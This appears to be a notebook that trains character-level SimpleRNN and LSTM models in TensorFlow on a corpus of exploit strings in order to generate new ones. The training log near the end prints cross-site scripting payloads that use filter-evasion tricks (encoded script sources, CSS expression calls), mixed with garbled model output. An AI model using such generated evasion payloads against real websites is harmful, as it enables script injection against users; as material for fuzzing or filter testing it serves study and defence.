# Imports 
This project is implemented using TensorFlow version 2.7.0 and NumPy version 1.19.5.

In [2]:
import sys 
import random 
import numpy as np 
import tensorflow as tf
from tensorflow.keras import layers, models  

# Print the TensorFlow and NumPy versions in use, so the run can be reproduced
print(tf.__version__)
print(np.__version__)

2.7.0
1.19.5


# Data Preprocessing 
Once we load our data, we create a vocabulary composed of the unique characters in the data. One thing to note here is that these exploits include a number of special characters, and sometimes even upper-case letters, and we have to keep them: they are part of the more diversified exploit content. So we just load the data and vectorize its content as-is.
### Vectorization
In order to feed our data to the model, we have to convert the string form of the data into numeric tensors (numeric vectors). For this we can use the StringLookup layer from TensorFlow, or do it manually using simple dictionary operations. In order to convert generated numeric IDs back into human-readable form, we can use the StringLookup layer of TensorFlow with the invert parameter set to True.

```
# with TensorFlow
chars_to_indices = tf.keras.layers.StringLookup(
    vocabulary=list(vocabulary), mask_token=None)

indices_to_chars = tf.keras.layers.StringLookup(
    vocabulary=chars_to_indices.get_vocabulary(), invert=True, mask_token=None
)
```

# Character Mappings 
Mapping characters simply means giving a unique ID to each unique character in the data we just loaded. This is important later when we feed the data into our model: the model uses these IDs to identify each character coming through the sequence.

In [6]:
# Load the entire corpus into one string
with open("./file.txt", 'r', encoding='utf-8') as f:
  data = f.read()

# The vocabulary is every distinct character of the corpus, in sorted order
vocabulary = sorted(set(data))
print(f"Length our vocabulary {len(vocabulary)}")

# Two lookup tables: character -> index, and the reverse index -> character
chars_to_indices = {char: index for index, char in enumerate(vocabulary)}
indices_to_chars = dict(enumerate(vocabulary))

Length our vocabulary 115


# Split the data into training examples and targets 

The data is split into smaller sequences of a fixed length, so that all input sequences have the same length, and the target is shifted one character to the right. The shifted character is the target value which we want to predict.

```
# with Tensorflow
# get the mapping of all characters from our input file 
vector_data = chars_to_indices(tf.strings.unicode_split(data, 'UTF-8')) 

vector_dataset = tf.data.Dataset.from_tensor_slices(vector_data)
```



# Create a batch of characters 
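The batch method of TensorFlow groups consecutive characters into sequences of the desired length; in this case the sequence length is set to 200 (the code batches seq_length + 1 characters so that each chunk can be split into an input sequence and its one-character-shifted target).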



```
# Tensorflow implementation 

seq_length = 200
sequences = vector_dataset.batch(seq_length+1, drop_remainder=True)

# utility function to split input sequence into sample and target 
def split_sequence(sequence):
  in_seq = sequence[:-1]
  target_seq = sequence[1:]
  return in_seq, target_seq

# then create dataset of input sample and target over the entire sequence 
new_dataset = sequences.map(split_sequence)

```



In [10]:
seq_length = 200
step = 3

# Slide a window of seq_length characters over the data, advancing `step`
# characters at a time. Each window is one training input and the character
# immediately after it is the value to predict.
window_starts = range(0, len(data) - seq_length, step)
sequences = [data[start: start + seq_length] for start in window_starts]
next_chars = [data[start + seq_length] for start in window_starts]

# Create One-Hot-Encoding matrix for X and Y

After the sequences are created, we want to make sure they are in the right form for our model by encoding them. A one-hot encoding scheme is used, where each character in our vocabulary is represented as a binary vector of 0s and 1s. To denote the i-th character of the vocabulary, the value at the i-th element of the vector is set to 1 and all other values are set to 0.

One thing to note here: X stores the encoded form of each input sequence, and y stores the encoded character that immediately follows that sequence, i.e. the next character to predict. As an example:



```
+----------------------------------------------+-----+
| [', ;, a, =, p, r, o, m, p, t, a, (, ), / ]  | [/] |
+----------------------------------------------+-----+

# or as a hello
+--------------+-------+
|      X       |   Y   |
+--------------+-------+
| [h, e, l, l] | [o]   |
| [e, l, l, o] | [ ]   |
| [l, l, o,  ] | [i]   |
| [l, o,  , i] | [n]   |
| ...          | ...   |
+--------------+-------+
```



In [11]:
# One-hot encode the training data.
#   x[i, t, k] is True when character t of sequence i is vocabulary entry k.
#   y[i, k]    is True when the character following sequence i is entry k.
# The builtin `bool` is used as the dtype: the `np.bool` alias was deprecated
# in NumPy 1.20 and removed in 1.24, while `bool` works on every version.
x = np.zeros((len(sequences), seq_length, len(vocabulary)), dtype=bool)
y = np.zeros((len(sequences), len(vocabulary)), dtype=bool)
for i, sequence in enumerate(sequences):
    for t, char in enumerate(sequence):
        x[i, t, chars_to_indices[char]] = 1
    y[i, chars_to_indices[next_chars[i]]] = 1

# Building the model 

In [23]:
vocab_length = len(vocabulary) # 115 for the data set used in this run (see the printed vocabulary length)
embedding_dimension = 256  # not referenced by the two one-hot model builders below
units = 128  # size passed to every recurrent layer in the builders below

def build_rnn_model():
  """Build and compile the SimpleRNN next-character classifier.

  The network takes one-hot input of shape (seq_length, vocab_length), runs it
  through two SimpleRNN layers of `units` cells (each followed by 20% dropout)
  and ends in a softmax over the vocabulary.

  Returns:
    The compiled Sequential model (categorical cross-entropy loss, rmsprop).
  """
  stacked_layers = [
      # The first recurrent layer returns the full sequence so that the
      # second recurrent layer receives one vector per time step.
      layers.SimpleRNN(units, input_shape=(seq_length, vocab_length), return_sequences=True),
      layers.Dropout(0.2),
      layers.SimpleRNN(units),
      layers.Dropout(0.2),
      layers.Dense(vocab_length, activation='softmax'),
  ]
  network = models.Sequential(stacked_layers)
  network.compile(loss='categorical_crossentropy', optimizer='rmsprop')
  return network


def build_lstm_model():
  """Build and compile the LSTM next-character classifier.

  Same layout as the SimpleRNN variant, with LSTM layers instead: one-hot
  input of shape (seq_length, vocab_length), two LSTM layers of `units` cells
  (each followed by 20% dropout) and a softmax over the vocabulary.

  Returns:
    The compiled Sequential model (categorical cross-entropy loss, rmsprop).
  """
  stacked_layers = [
      # The first LSTM returns the full sequence so that the second LSTM
      # receives one vector per time step.
      layers.LSTM(units, input_shape=(seq_length, vocab_length), return_sequences=True),
      layers.Dropout(0.2),
      layers.LSTM(units),
      layers.Dropout(0.2),
      layers.Dense(vocab_length, activation='softmax'),
  ]
  network = models.Sequential(stacked_layers)
  network.compile(loss='categorical_crossentropy', optimizer='rmsprop')
  return network

In [24]:
# Instantiate the SimpleRNN model and print its layer/parameter summary
rnn_model = build_rnn_model()
rnn_model.summary()

Model: "sequential_5"
_________________________________________________________________
 Layer (type)                Output Shape              Param #   
 simple_rnn_5 (SimpleRNN)    (None, 200, 128)          31232     
                                                                 
 dropout_11 (Dropout)        (None, 200, 128)          0         
                                                                 
 simple_rnn_6 (SimpleRNN)    (None, 128)               32896     
                                                                 
 dropout_12 (Dropout)        (None, 128)               0         
                                                                 
 dense_4 (Dense)             (None, 115)               14835     
                                                                 
Total params: 78,963
Trainable params: 78,963
Non-trainable params: 0
_________________________________________________________________


In [25]:
# Instantiate the LSTM model and print its layer/parameter summary.
# NOTE(review): the summary recorded below lists three LSTM layers (the last
# one with 700 units), which does not match build_lstm_model as defined in this
# file (two LSTM layers of `units` cells). It appears to come from an earlier
# version of the function; re-run this cell to refresh it.
lstm_model = build_lstm_model()
lstm_model.summary()

Model: "sequential_6"
_________________________________________________________________
 Layer (type)                Output Shape              Param #   
 lstm_6 (LSTM)               (None, 200, 128)          124928    
                                                                 
 dropout_13 (Dropout)        (None, 200, 128)          0         
                                                                 
 lstm_7 (LSTM)               (None, 200, 128)          131584    
                                                                 
 dropout_14 (Dropout)        (None, 200, 128)          0         
                                                                 
 lstm_8 (LSTM)               (None, 700)               2321200   
                                                                 
 dropout_15 (Dropout)        (None, 700)               0         
                                                                 
 dense_5 (Dense)             (None, 115)              

In [28]:
import os
# Directory where the checkpoints will be saved
checkpoint_dir = './training_checkpoints'
# Name of the checkpoint files; "{epoch}" is a placeholder left in the path
# for the checkpoint callback to fill in
checkpoint_prefix = os.path.join(checkpoint_dir, "ckpt_{epoch}")

# Checkpoint callback writing to the path above; save_weights_only=True asks
# for the weights only rather than the whole model
checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(
    filepath=checkpoint_prefix,
    save_weights_only=True)

def sample(preds, temperature=1.0):
    """Sample one index from a probability array, reshaped by a temperature.

    The probabilities are re-weighted as ``p ** (1 / temperature)`` and
    renormalised, then a single index is drawn from the result. Temperatures
    below 1 sharpen the distribution (more conservative picks), temperatures
    above 1 flatten it (more diverse picks).

    Args:
        preds: 1-D array-like of probabilities, e.g. a softmax output.
        temperature: Non-zero scaling factor applied to the log-probabilities.

    Returns:
        The sampled index, as returned by ``np.argmax``.

    Raises:
        ValueError: If ``temperature`` is 0.
    """
    if temperature == 0:
        raise ValueError("temperature must be non-zero")

    probs = np.asarray(preds).astype('float64')
    # log(0) is -inf, which is exactly the "never pick this" score we want,
    # so silence the divide-by-zero warning NumPy would emit for it.
    with np.errstate(divide='ignore'):
        scaled = np.log(probs) / temperature
    # Shift so the largest score is 0 before exponentiating. Without this,
    # a small temperature makes every exp() underflow to 0 and the
    # normalisation below turns into 0/0 = NaN.
    scaled -= np.max(scaled)
    weights = np.exp(scaled)
    probs = weights / np.sum(weights)
    # One multinomial trial yields a one-hot row; argmax recovers its index.
    draw = np.random.multinomial(1, probs, 1)
    return np.argmax(draw)


class SampleExploit(tf.keras.callbacks.Callback):
    """Keras callback that prints generated text at the end of every epoch.

    A random seed window of `seq_length` characters is taken from `data`; for
    each diversity (sampling temperature) the seed is printed, followed by 200
    characters generated one at a time by the model being trained.
    """

    def on_epoch_end(self, batch, logs=None):
        """Generate and print sample text with the model under training.

        Args:
            batch: Value Keras passes positionally at the end of an epoch (the
                epoch index); unused here. The parameter name is kept as-is
                for backward compatibility.
            logs: Metrics dict supplied by Keras; unused here.
        """
        start_index = random.randint(0, len(data) - seq_length - 1)
        seed = data[start_index: start_index + seq_length]

        for diversity in [0.5, 1.2]:
            sentence = seed
            sys.stdout.write(sentence)
            for _ in range(200):
                # One-hot encode the current window as a batch of one.
                x_pred = np.zeros((1, seq_length, len(vocabulary)))
                for t, char in enumerate(sentence):
                    x_pred[0, t, chars_to_indices[char]] = 1.
                # Use the model this callback is attached to (set by Keras),
                # not a hard-coded global, so the callback samples from
                # whichever model is actually being fitted.
                preds = self.model.predict(x_pred, verbose=0)[0]
                next_index = sample(preds, diversity)
                next_char = indices_to_chars[next_index]
                # Slide the window: drop the oldest character, append the new one.
                sentence = sentence[1:] + next_char
                sys.stdout.write(next_char)
                sys.stdout.flush()
            print()



In [29]:
EPOCHS = 20
# Train the SimpleRNN model. checkpoint_callback is registered here as well:
# it was configured earlier but never passed to fit(), so no weights were
# being saved during training.
history = rnn_model.fit(
    x, y,
    epochs=EPOCHS,
    batch_size=80,
    callbacks=[checkpoint_callback, SampleExploit()],
)

Epoch 1/20
<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script>
<script>
<script>
<img src=&#x0000\&#1000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011)&#x0001)&
61' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script=<nlotOlaersars(j8'asct(#))<><Z073m><)V<iSC IPT>
"lMDIdDSC2LC=&#1!6C%XB%4Q%2c="aalert(')>></sciipt>"//m'
\4.;v vagt&lerSIC;-UoE0NPC=,IYn^;alert(17" ivComc\R8C=8%58;%T/&qksa0&#180>&#10AA>\0x7s\xck&lx:"
Epoch 2/20
ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)</script>
"`'</script src="x s="><script>
<act ht l er=" ontrale="javascript:alert(1)"></srlert>
<script x="javascript:al

# Word Embedding 
Another way to represent the data to our network is using word embedding. The process is almost the same, except that instead of using one-hot encoding we use the Embedding layer of TensorFlow.

In [None]:
# Create our vocabulary: the sorted list of distinct characters in the data
vocabulary = sorted(set(data))

In [None]:
# Vectorize: convert the string characters to numerical form
chars_to_indices = tf.keras.layers.StringLookup(
    vocabulary=list(vocabulary), mask_token=None
)

# To decode indices back to characters, build the inverse lookup from
# chars_to_indices.get_vocabulary() rather than from `vocabulary` itself.
# This ensures both layers share exactly the same index assignment, including
# the entry the forward layer reserves for characters that are not in the
# vocabulary.
indices_to_chars = tf.keras.layers.StringLookup(
    vocabulary=chars_to_indices.get_vocabulary(), invert=True, mask_token=None
)

# Utility function to join characters and form the exploit 
def exploit_from_indices(indices):
  """Decode character indices and join them along the last axis into a string tensor."""
  decoded_chars = indices_to_chars(indices)
  return tf.strings.reduce_join(decoded_chars, axis=-1)

# Preparing data for prediction 
As in the previous implementation, the data will be divided into input sequences and target characters to train our model.

In [None]:
# Get the index of every character in the data and build a dataset from them.
# The string ops live in `tf.strings` (plural); `tf.string` is the string
# dtype and has no `unicode_split` attribute.
indices = chars_to_indices(tf.strings.unicode_split(data, 'UTF-8'))
indices_dataset = tf.data.Dataset.from_tensor_slices(indices)

# Example: decode and print the first 10 characters.
# The loop variable has its own name so it does not overwrite `indices`.
for index in indices_dataset.take(10):
  print(indices_to_chars(index).numpy().decode('utf-8'))

In [None]:
# Create sequences of a fixed length 
seq_length = 200
# Number of complete (seq_length + 1)-character chunks contained in the data
sample_per_epoch = len(data) // (seq_length+1)
# Group the indices into chunks of seq_length + 1; drop_remainder=True
# discards a trailing chunk that is shorter than that
sequences = indices_dataset.batch(seq_length+1, drop_remainder=True)
# Example: decode the first chunk back into characters
for seq in sequences.take(1):
  print(indices_to_chars(seq))